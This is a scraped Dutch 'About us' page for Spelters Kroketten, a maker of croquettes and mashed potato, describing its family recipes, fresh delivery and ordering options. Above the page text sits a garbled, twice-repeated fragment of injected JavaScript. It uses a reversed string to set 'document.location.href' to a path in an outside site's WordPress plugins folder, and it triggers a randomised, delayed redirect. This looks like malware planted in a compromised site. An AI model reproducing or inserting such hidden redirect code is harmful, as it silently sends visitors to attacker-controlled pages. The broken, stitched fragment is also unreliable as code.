toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dow,toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}document,'script','dataLayer','GTM-TDHP3RX');

Over Ons

Over Ons

Waarom kiezen voor Spelters Kroketten?

Onze ouders begonnen destijds met het bedrijf met de gedachte om aardappelbereidingen te maken met respect voor de tradities uit de keuken. Ze vertrokken dan ook van grootmoeders recepten voor hun kroketten en puree en dat doen we vandaag nog steeds.

Alle gerechten worden de ochtend na de bereiding al geleverd. U bent dus zeker van een verse artisanale aardappelbereiding .

Wij leveren vooral aan slagers, traiteurs, restaurants en winkels, maar ook particulieren kunnen gerust iets bij ons bestellen.

Groot assortiment in verschillende volumes

Omdat verse producten een strikte behandeling nodig hebben, stellen wij alles in het werk om alles vers te houden en correct en hygiënisch te leveren. Al onze producten worden zorgvuldig verpakt in kleine of grote hoeveelheden onder beschermde atmosfeer.

Ons assortiment is in de loop der jaren ook flink uitgebreid. Vandaag kunnen wij u een topproduct aanbieden voor iedere gang van uw maaltijd. Van het aperitiefhapje tot het hoofdgerecht. Zo hopen wij u steeds te laten genieten van één van onze bereidingen.

Bestelling plaatsen?

Al onze producten zijn verkrijgbaar in diverse verpakkingen en volumes.

Kroketten of puree bestellen kan snel en eenvoudig met het online bestelformulier. Maar ook telefonisch of via mail is uiteraard mogelijk. Klik hieronder om naar het bestelformulier te gaan en maak uw keuze.

BESTEL NU